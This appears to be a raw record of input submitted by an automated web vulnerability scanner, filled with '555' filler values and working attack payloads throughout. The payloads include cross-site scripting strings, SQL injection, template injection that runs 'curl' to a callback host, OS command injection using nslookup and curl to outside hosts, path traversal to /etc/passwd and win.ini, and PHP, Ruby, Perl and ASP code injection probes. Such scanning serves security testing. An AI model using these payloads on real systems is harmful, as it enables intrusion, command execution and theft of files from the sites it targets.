-
?<img zzz onmouseover=CU0q(97131) //?>
-
555
-
555<ScRiPt>CU0q(9974)</sCripT>
-
555\u003CScRiPt\CU0q(9846)\u003C/sCripT\u003E
-
555
-
%35%35%35%3C%53%63%52%69%50%74%20%3E%43%55%30%71%289260%29%3C%2F%73%43%72%69%70%54%3E
-
555<img/src=">" onerror=alert(9269)>
-
555<img src=xyz OnErRor=CU0q(9251)>
-
555<img src=//xss.bxss.me/t/dot.gif onload=CU0q(9016)>
-
555
-
555<body onload=CU0q(9533)>
-
555
-
555<isindex type=image src=1 onerror=CU0q(9619)>
-
555<svg
?
-
555<
-
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9583></ScRiPt>
-
555<ScRiPt
>CU0q(9023)</ScRiPt>
-
555<ScR<ScRiPt>IpT>CU0q(9950)</sCr<ScRiPt>IpT>
-
555<script>CU0q(9708)</script>9708
-
555
-
555<script>CU0q(9057)</script>
-
555<WAM32Y>K6KXW[!+!]</WAM32Y>
-
555
-
555<ScRiPt >CU0q(9419)</ScRiPt>
-
555
-
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
-
dfb__${98991*97996}__::.x
-
dfb[[${98991*97996}]]xca
-
dfb{{98991*97996}}xca
-
555
-
555
-
555
-
555
-
<th:t="${dfb}#foreach
-
555
-
555
-
555
-
<%={{={@{#{${dfb}}%>
-
555
-
bfgx7118??z1??z2a?bcxhjl7118
-
555
-
bfg9556<s1?s2?s3?hjl9556
-
555
-
5559095513
-
555
-
555
-
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitruyppyvxpa2a77e.bxss.me")}}
-
555
-
555
-
555<a3DbMzw<
-
555<ab2641P x=9319>
-
555<ifRAme sRc=9862.com></IfRamE>
-
555<W4TXB9>HCOXK[!+!]</W4TXB9>
-
555Oo032
<ScRiPt >9fnr(9110)</ScRiPt>
-
555}body{zzz:Expre/**/SSion(9fnr(9519))}
-
<a HrEF=jaVaScRiPT:>
-
<a HrEF=http://xss.bxss.me></a>
-
555<input autofocus onfocus=9fnr(9100)>
-
?<img zzz onmouseover=9fnr(90711) //?>
-
555
-
555<ScRiPt>9fnr(9545)</sCripT>
-
555
-
555\u003CScRiPt\9fnr(9731)\u003C/sCripT\u003E
-
%35%35%35%3C%53%63%52%69%50%74%20%3E%39%66%6E%72%289433%29%3C%2F%73%43%72%69%70%54%3E
-
555<img/src=">" onerror=alert(9971)>
-
555<img src=xyz OnErRor=9fnr(9850)>
-
555<img src=//xss.bxss.me/t/dot.gif onload=9fnr(9438)>
-
555
-
555<body onload=9fnr(9945)>
-
555
-
555<isindex type=image src=1 onerror=9fnr(9902)>
-
555<svg
?
-
555<
-
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9198></ScRiPt>
-
555<ScRiPt
>9fnr(9069)</ScRiPt>
-
555
-
555<ScR<ScRiPt>IpT>9fnr(9815)</sCr<ScRiPt>IpT>
-
555<script>9fnr(9864)</script>9864
-
555
-
555<script>9fnr(9751)</script>
-
555
-
555<WRN1BM>RSSW3[!+!]</WRN1BM>
-
555<ScRiPt >9fnr(9149)</ScRiPt>
-
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
-
dfb__${98991*97996}__::.x
-
555
-
dfb[[${98991*97996}]]xca
-
555
-
dfb{{98991*97996}}xca
-
555
-
555
-
555
-
555
-
555
-
<th:t="${dfb}#foreach
-
555
-
555
-
<%={{={@{#{${dfb}}%>
-
555
-
bfgx3606??z1??z2a?bcxhjl3606
-
555
-
bfg9896<s1?s2?s3?hjl9896
-
555
-
555
-
5559637209
-
555
-
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitefbjggmice5e90c.bxss.me")}}
-
555<a07T5oi<
-
555<aQakqoY x=9220>
-
555<ifRAme sRc=9212.com></IfRamE>
-
555<WTJ25T>KZXB7[!+!]</WTJ25T>
-
555TXdT4
<ScRiPt >LIBk(9959)</ScRiPt>
-
555}body{zzz:Expre/**/SSion(LIBk(9922))}
-
<a HrEF=jaVaScRiPT:>
-
<a HrEF=http://xss.bxss.me></a>
-
555<input autofocus onfocus=LIBk(9382)>
-
?<img zzz onmouseover=LIBk(95221) //?>
-
555<ScRiPt>LIBk(9354)</sCripT>
-
555\u003CScRiPt\LIBk(9289)\u003C/sCripT\u003E
-
%35%35%35%3C%53%63%52%69%50%74%20%3E%4C%49%42%6B%289179%29%3C%2F%73%43%72%69%70%54%3E
-
555<img/src=">" onerror=alert(9723)>
-
555<img src=xyz OnErRor=LIBk(9214)>
-
555<img src=//xss.bxss.me/t/dot.gif onload=LIBk(9122)>
-
555
-
555
-
555<body onload=LIBk(9008)>
-
555<isindex type=image src=1 onerror=LIBk(9223)>
-
555
-
555<svg
?
-
555
-
555<
-
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9370></ScRiPt>
-
555<ScRiPt
>LIBk(9575)</ScRiPt>
-
555<ScR<ScRiPt>IpT>LIBk(9658)</sCr<ScRiPt>IpT>
-
555<script>LIBk(9120)</script>9120
-
555<script>LIBk(9854)</script>
-
555
-
555<WUUBQ9>I9G1L[!+!]</WUUBQ9>
-
555<ScRiPt >LIBk(9305)</ScRiPt>
-
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
-
dfb__${98991*97996}__::.x
-
555
-
dfb[[${98991*97996}]]xca
-
555
-
dfb{{98991*97996}}xca
-
555
-
555
-
<th:t="${dfb}#foreach
-
555
-
<%={{={@{#{${dfb}}%>
-
555
-
bfgx10746??z1??z2a?bcxhjl10746
-
555
-
bfg9140<s1?s2?s3?hjl9140
-
555
-
5559321697
-
555
-
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitlesrvqmojk91814.bxss.me")}}
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555<a3ZxTcV<
-
555<alTvzp2 x=9843>
-
555<ifRAme sRc=9611.com></IfRamE>
-
555<WPZMMZ>ASHX3[!+!]</WPZMMZ>
-
555Tcxdd
<ScRiPt >48Wi(9018)</ScRiPt>
-
555}body{zzz:Expre/**/SSion(48Wi(9558))}
-
<a HrEF=jaVaScRiPT:>
-
<a HrEF=http://xss.bxss.me></a>
-
555<input autofocus onfocus=48Wi(9158)>
-
?<img zzz onmouseover=48Wi(91231) //?>
-
555<ScRiPt>48Wi(9945)</sCripT>
-
555\u003CScRiPt\48Wi(9614)\u003C/sCripT\u003E
-
%35%35%35%3C%53%63%52%69%50%74%20%3E%34%38%57%69%289428%29%3C%2F%73%43%72%69%70%54%3E
-
555<img/src=">" onerror=alert(9073)>
-
555
-
555<img src=xyz OnErRor=48Wi(9924)>
-
555
-
555<img src=//xss.bxss.me/t/dot.gif onload=48Wi(9430)>
-
555<body onload=48Wi(9275)>
-
555<isindex type=image src=1 onerror=48Wi(9563)>
-
555
-
555<svg
?
-
555<
-
555
-
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9910></ScRiPt>
-
555<ScRiPt
>48Wi(9449)</ScRiPt>
-
555<ScR<ScRiPt>IpT>48Wi(9859)</sCr<ScRiPt>IpT>
-
555<script>48Wi(9495)</script>9495
-
555<script>48Wi(9019)</script>
-
555<WMYF0C>MA9UF[!+!]</WMYF0C>
-
555
-
555<ScRiPt >48Wi(9297)</ScRiPt>
-
555
-
555
-
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
-
dfb__${98991*97996}__::.x
-
dfb[[${98991*97996}]]xca
-
dfb{{98991*97996}}xca
-
555
-
555
-
555
-
555
-
<th:t="${dfb}#foreach
-
555
-
555
-
555
-
<%={{={@{#{${dfb}}%>
-
bfgx8026??z1??z2a?bcxhjl8026
-
555
-
bfg2834<s1?s2?s3?hjl2834
-
555
-
555
-
5559182293
-
555
-
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitqnubuwitdp4be8d.bxss.me")}}
-
555
-
555
-
555
-
555<ak629oc<
-
555<aT13MoK x=9231>
-
555<ifRAme sRc=9923.com></IfRamE>
-
555<WM06S7>KFS4A[!+!]</WM06S7>
-
555cz1Gh
<ScRiPt >y9JL(9541)</ScRiPt>
-
555}body{zzz:Expre/**/SSion(y9JL(9634))}
-
<a HrEF=jaVaScRiPT:>
-
555
-
<a HrEF=http://xss.bxss.me></a>
-
555<input autofocus onfocus=y9JL(9910)>
-
555
-
?<img zzz onmouseover=y9JL(95241) //?>
-
555<ScRiPt>y9JL(9552)</sCripT>
-
555\u003CScRiPt\y9JL(9700)\u003C/sCripT\u003E
-
%35%35%35%3C%53%63%52%69%50%74%20%3E%79%39%4A%4C%289075%29%3C%2F%73%43%72%69%70%54%3E
-
555
-
555<img/src=">" onerror=alert(9836)>
-
555
-
555<img src=xyz OnErRor=y9JL(9030)>
-
555<img src=//xss.bxss.me/t/dot.gif onload=y9JL(9750)>
-
555<body onload=y9JL(9450)>
-
555<isindex type=image src=1 onerror=y9JL(9148)>
-
555<svg
?
-
555
-
555<
-
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9649></ScRiPt>
-
555<ScRiPt
>y9JL(9979)</ScRiPt>
-
555
-
555<ScR<ScRiPt>IpT>y9JL(9423)</sCr<ScRiPt>IpT>
-
555
-
555<script>y9JL(9831)</script>9831
-
555<script>y9JL(9452)</script>
-
555<WJVIAS>PCYOR[!+!]</WJVIAS>
-
555<ScRiPt >y9JL(9782)</ScRiPt>
-
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
-
555
-
dfb__${98991*97996}__::.x
-
555
-
dfb[[${98991*97996}]]xca
-
555
-
555
-
dfb{{98991*97996}}xca
-
555
-
555
-
555
-
555
-
<th:t="${dfb}#foreach
-
555
-
555
-
<%={{={@{#{${dfb}}%>
-
555
-
bfgx3042??z1??z2a?bcxhjl3042
-
555
-
bfg3342<s1?s2?s3?hjl3342
-
5559901106
-
555
-
555
-
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitvcturdqwpq8f883.bxss.me")}}
-
555<aZrv8Fg<
-
555<abl7UaL x=9491>
-
555<ifRAme sRc=9832.com></IfRamE>
-
555<WSWNNV>UJ9XE[!+!]</WSWNNV>
-
555cXHHs
<ScRiPt >TPEM(9648)</ScRiPt>
-
555}body{zzz:Expre/**/SSion(TPEM(9575))}
-
<a HrEF=jaVaScRiPT:>
-
<a HrEF=http://xss.bxss.me></a>
-
555<input autofocus onfocus=TPEM(9981)>
-
?<img zzz onmouseover=TPEM(91101) //?>
-
555
-
555<ScRiPt>TPEM(9866)</sCripT>
-
555\u003CScRiPt\TPEM(9197)\u003C/sCripT\u003E
-
555
-
%35%35%35%3C%53%63%52%69%50%74%20%3E%54%50%45%4D%289348%29%3C%2F%73%43%72%69%70%54%3E
-
555<img/src=">" onerror=alert(9054)>
-
555<img src=xyz OnErRor=TPEM(9876)>
-
555<img src=//xss.bxss.me/t/dot.gif onload=TPEM(9721)>
-
555
-
555<body onload=TPEM(9855)>
-
555
-
555<isindex type=image src=1 onerror=TPEM(9292)>
-
555<svg
?
-
555<
-
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9366></ScRiPt>
-
555<ScRiPt
>TPEM(9959)</ScRiPt>
-
555
-
555<ScR<ScRiPt>IpT>TPEM(9816)</sCr<ScRiPt>IpT>
-
555<script>TPEM(9557)</script>9557
-
555
-
555<script>TPEM(9968)</script>
-
555
-
555<WG3YKC>AKUCG[!+!]</WG3YKC>
-
555<ScRiPt >TPEM(9743)</ScRiPt>
-
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
-
dfb__${98991*97996}__::.x
-
dfb[[${98991*97996}]]xca
-
dfb{{98991*97996}}xca
-
555
-
555
-
555
-
555
-
555
-
<th:t="${dfb}#foreach
-
555
-
555
-
555
-
<%={{={@{#{${dfb}}%>
-
555
-
bfgx2365??z1??z2a?bcxhjl2365
-
555
-
bfg9733<s1?s2?s3?hjl9733
-
555
-
5559307872
-
555
-
555
-
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitpczukvkevu01a78.bxss.me")}}
-
555
-
"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(112)+CHAR(97)+CHAR(106)+CHAR(114)+CHAR(119)+CHAR(97)+CHAR(116)+CHAR(122)) FROM syscolumns)+"
-
(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(112)+CHAR(97)+CHAR(106)+CHAR(114)+CHAR(119)+CHAR(97)+CHAR(116)+CHAR(122)) FROM syscolumns)
-
-1" OR 5*5=25 or "Zea3rNkd"="
-
-1" OR 5*5=25 --
-
-1 OR 5*5=25
-
-1 OR 5*5=25 --
-
555
-
555YpcCxkJi
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555<aAoFYWX<
-
555<awsub54 x=9482>
-
555<ifRAme sRc=9630.com></IfRamE>
-
555<W1JXNM>0XCSZ[!+!]</W1JXNM>
-
555Xz362
<ScRiPt >5pXy(9886)</ScRiPt>
-
555}body{zzz:Expre/**/SSion(5pXy(9802))}
-
<a HrEF=jaVaScRiPT:>
-
<a HrEF=http://xss.bxss.me></a>
-
555<input autofocus onfocus=5pXy(9827)>
-
?<img zzz onmouseover=5pXy(96601) //?>
-
555<ScRiPt>5pXy(9708)</sCripT>
-
555\u003CScRiPt\5pXy(9587)\u003C/sCripT\u003E
-
%35%35%35%3C%53%63%52%69%50%74%20%3E%35%70%58%79%289408%29%3C%2F%73%43%72%69%70%54%3E
-
555<img/src=">" onerror=alert(9106)>
-
555<img src=xyz OnErRor=5pXy(9473)>
-
555<img src=//xss.bxss.me/t/dot.gif onload=5pXy(9601)>
-
555<body onload=5pXy(9878)>
-
555
-
555<isindex type=image src=1 onerror=5pXy(9488)>
-
555<svg
?
-
555<
-
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9783></ScRiPt>
-
555<ScRiPt
>5pXy(9534)</ScRiPt>
-
555<ScR<ScRiPt>IpT>5pXy(9674)</sCr<ScRiPt>IpT>
-
555<script>5pXy(9850)</script>9850
-
555
-
555<script>5pXy(9699)</script>
-
555<WNQDFS>SPRHI[!+!]</WNQDFS>
-
555<ScRiPt >5pXy(9534)</ScRiPt>
-
555
-
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
-
dfb__${98991*97996}__::.x
-
dfb[[${98991*97996}]]xca
-
dfb{{98991*97996}}xca
-
555
-
555
-
555
-
<th:t="${dfb}#foreach
-
555
-
555
-
<%={{={@{#{${dfb}}%>
-
bfgx9008??z1??z2a?bcxhjl9008
-
bfg7722<s1?s2?s3?hjl7722
-
5559442700
-
555
-
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitzwuoxjpmqqbbbae.bxss.me")}}
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
|(nslookup${IFS}-q${IFS}cname${IFS}hitznbkrewdsq44150.bxss.me||curl${IFS}hitznbkrewdsq44150.bxss.me)
-
;(nslookup -q=cname hitzuyjaliwjd6db93.bxss.me||curl hitzuyjaliwjd6db93.bxss.me)|(nslookup -q=cname hitzuyjaliwjd6db93.bxss.me||curl hitzuyjaliwjd6db93.bxss.me)&(nslookup -q=cname hitzuyjaliwjd6db93.bxss.me||curl hitzuyjaliwjd6db93.bxss.me)
-
`(nslookup -q=cname hitumkyrcgkgj2ec62.bxss.me||curl hitumkyrcgkgj2ec62.bxss.me)`
-
|(nslookup -q=cname hitlridergvty32b6f.bxss.me||curl hitlridergvty32b6f.bxss.me)
-
$(nslookup -q=cname hitrqmpewthpb64203.bxss.me||curl hitrqmpewthpb64203.bxss.me)
-
(nslookup -q=cname hitsspnkphkxe22b66.bxss.me||curl hitsspnkphkxe22b66.bxss.me))
-
expr 9000373730 - 923235
-
555"||sleep(27*1000)*cmhqwu||"
-
555"&&sleep(27*1000)*smrkbs&&"
-
555
-
-
555
-
555
-
-
555
-
555
-
555
-
-
555
-
${@print(md5(31337))}\
-
555
-
555
-
${@print(md5(31337))}
-
555
-
555
-
";print(md5(31337));$a="
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
<!--
-
555
-
555
-
process.asp/.
-
555
-
555
-
555
-
process.asp
-
555
-
555
-
555
-
555
-
555
-
555
-
process.asp
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
"+"A".concat(70-3).concat(22*4).concat(118).concat(82).concat(116).concat(67)+(require"socket"
Socket.gethostbyname("hitam"+"iogfkmwx82267.bxss.me.")[3].to_s)+"
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
http://bxss.me/t/fit.txt?.jpg
-
555
-
555
-
Http://bxss.me/t/fit.txt
-
555
-
555
-
bxss.me
-
c:/windows/win.ini
-
../../../../../../../../../../../../../../etc/shells
-
bxss.me/t/xss.html?%00
-
/etc/shells
-
HttP://bxss.me/t/xss.html?%00
-
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs
-
555
-
555
-
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
".gethostbyname(lc("hitdl"."kwoehyjh2db6a.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(69).chr(115).chr(81)."
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
../555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
file:///etc/passwd
-
555
-
555
-
../../../../../../../../../../../../../../windows/win.ini
-
555
-
555
-
../../../../../../../../../../../../../../etc/passwd
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
^(#$!@#$)(()))******
-
555
-
555
-
!(()&&!|*|*|
-
555
-
555
-
)
-
555
-
555
-
555
-
555
-
555
-
https://m.snmedia.or.kr/
-
555
-
555
-
555
-
redirtest.acx
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
${9999950+10000334}
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555<esi:include src="http://bxss.me/rpb.png"/>
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
/../../../../../../../../../../windows/system32/BITSADMIN.exe
-
555
-
555
-
555
-
555
-
555
-
<% response.write(9995618*9260730) %>
-
"+response.write(9995618*9260730)+"
-
response.write(9995618*9260730)
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
1BZNQY6VY0
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
555
-
-
-
-
-
-
-
-
-
-
ㄷ
-
-
-
555
-
555
-
555MBuhajBa
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
-1" OR 2+300-300-1=0+0+0+1 --
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555